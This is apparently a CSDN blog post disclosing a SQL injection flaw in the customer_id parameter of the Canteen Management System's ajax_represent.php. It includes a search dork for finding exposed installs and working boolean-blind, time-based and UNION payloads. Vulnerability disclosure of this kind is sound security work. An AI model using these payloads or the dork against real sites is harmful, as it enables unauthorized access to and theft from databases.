Canteen Management System ajax_represent.php sql injection

最新推荐文章于 2024-09-24 10:23:17 发布
最新推荐文章于 2024-09-24 10:23:17 发布
阅读量2.2k 收藏
点赞数
文章标签: php ajax sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hzwsuki/article/details/128277038
版权
Canteen Management System ajax_represent.php sql injection

inurl: youthappam/php_action/ajax_represent.php

Abstract:

Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.
  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to query() in ajax_represent.php at line 27.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

current-db

在这里插入图片描述
payload:

Parameter: customer_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -

Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

huangsirer
关注
canteen-management-system-final.zip
08-19
餐厅点餐平台整套源码 + 数据库源文件 + 教程
Python库 | canteen-0.4-alpha.macosx-10.10-x86_64.tar.gz
04-07
资源分类:Python库 所属语言:Python 资源全名:canteen-0.4-alpha.macosx-10.10-x86_64.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
qq_41988749的博客
10-27 2410
【代码】Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
SourceCodester Online Tours & Travels Management System booking.php sql injection
@sec
09-05 9283
【代码】SourceCodester Online Tours & Travels Management System booking.php sql injection
SourceCodester Yoga Class Registration System manage_category sql injection
Dwayne_Wade的博客
03-13 1万+
【代码】SourceCodester Yoga Class Registration System manage_category sql injection
SQL Injection
kezhen的专栏
03-23 2656
https://www.owasp.org/index.php/SQL_Injection Overview A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A succe
Java报错注入,Java中的JSON注入强化错误
weixin_32047493的博客
03-22 399
我从客户端获取 SUBSCRIPTION_JSON ,将其转换为String,然后使用gson库将其设置为ModelObject。在Fortify安全性上运行代码时,它在以下代码上给我Json注入错误,并显示以下消息:这是错误:On line 159 of ActionHelper.java, the method jsonToObject() writes unvalidated input i...
nodejs中查询mysql防止SQL注入
cowcomic的专栏
08-03 6375
Performing queries The most basic way to perform a query is to call the .query() method on an object (like a Connection, Pool, or PoolNamespace instance). The simplest form of .query() is .query(sql...
java json injection_在Java中强化JSON注入错误
weixin_42565652的博客
02-24 527
我从客户端获取SUBSCRIPTION_JSON,我将其转换为String,然后使用gson库将其设置为Model Object.在Fortify安全性上运行代码时,它在下面的代码中给出了Json注入错误,并带有以下消息:这是错误:On line 159 of ActionHelper.java, the method jsonToObject() writes unvalidated input...
FindBugs规则整理-下
dingnate的专栏
01-20 1万+
86.RV: Method ignores return value (RV_RETURN_VALUE_IGNORED) 该方法的返回值应该进行检查。这种警告通常出现在调用一个不可变对象的方法,认为它更新了对象的值。例如:String dateString = getHeaderField(name); dateString.trim(); 程序员似乎以为trim()方法将更新dateStr
SQL Injection --- from dvwa的网页链接——2021-12-8
stumiss的博客
12-08 418
文章目录OverviewThread Model 威胁建模DiscriptionRisk Factor Overview A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from t
Java代码审计手册(English)
重新启程
10-14 1万+
Table of Contents Predictable pseudorandom number generator (PREDICTABLE_RANDOM) Predictable pseudorandom number generator (Scala) (PREDICTABLE_RANDOM_SCALA) Untrusted servlet parameter (SERVLET...
执行sql时出现错误 extraneous input ';' expecting EOF near '<EOF>'
热门推荐
xieganyu3460的博客
10-15 4万+
原文问题: 调用jdbc执行hive sql时出现错误 Error while compiling statement: FAILED: ParseException line 5:22 extraneous input ';' expecting EOF near '&lt;EOF&gt;' 错误原因是因为sql语句中多了分号   执行脚本时需要在sql后面添加分号 但是调用jdbc...
详细介绍swoole以及其优缺点
最新发布
weixin_45734165的博客
09-24 242
Swoole的Coroutine支持意味着即使您正在执行大量昂贵的I / O(例如,与数据库进行对话,使用文件系统,发出HTTP请求),您也可以处理许多请求。有趣的是,Zend Framework和Laminas社区的成员认为,异步服务器能够处理的请求是标准设置所能达到的四到七倍。因此,在Swoole运行时中,这是一项非常有用且方便的功能,但是如果您可以在自己的代码中避免这样做,那就更好了。您将需要习惯日志记录。因此,如果您要直接编写Swoole,但仍想使用自己的框架,则需要进行调整-但这可能是一个问题。
PHP中error_reporting函数作用
sheji888的专栏
09-24 382
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
django_CCOS ├── canteen //app1 ├── customer //app2 ├── dish //app3 │ ├── admin.py │ ├── apps.py │ ├── migrations │ ├── models.py //数据库模型 │ ├── tests.py │ ├── urls.py │ ├── views.py //实现的视图 │ └── __init__.py ├── django_CCOS │ ├── asgi.py │ ├── settings.py //配置文件 │ ├── urls.py │ ├── wsgi.py │ └── __init__.py ├── manage.py ├── media //图片文件 │ └── images ├── static //样式文件 │ ├── bootstrap-3.3.7-dist │ ├── css │ └── js └── templates //页面模板 ├── base.html ├── canteen │ ├── canteen_base.html │ ├── canteen_list.html //食堂展示 │ └── shop_list.html //窗口展示 ├── customer │ ├── index.html │ ├── information.html //完善用户信息 │ ├── login.html //登录界面 │ ├── logout.html //登出界面 │ ├── register.html //注册界面 │ └── show_info.html //个人 └── dish ├── dish_base.html ├── dish_list.html //菜品展示 └── my_order.html //我的订单 ```
06-01
这是一个 Django 项目的目录结构,包含了多个应用(app1, app2, app3),每个应用都有自己的模型、视图、URL、模板等组成部分。其中,app3(dish应用)包含了数据库模型,实现了菜品展示和我的订单页面。静态文件和媒体文件分别放在了static和media文件夹中,而templates文件夹则包含了所有的页面模板。配置文件settings.py用于配置项目的设置。manage.py是Django项目的命令行工具,可以用来启动开发服务器、创建数据库等操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值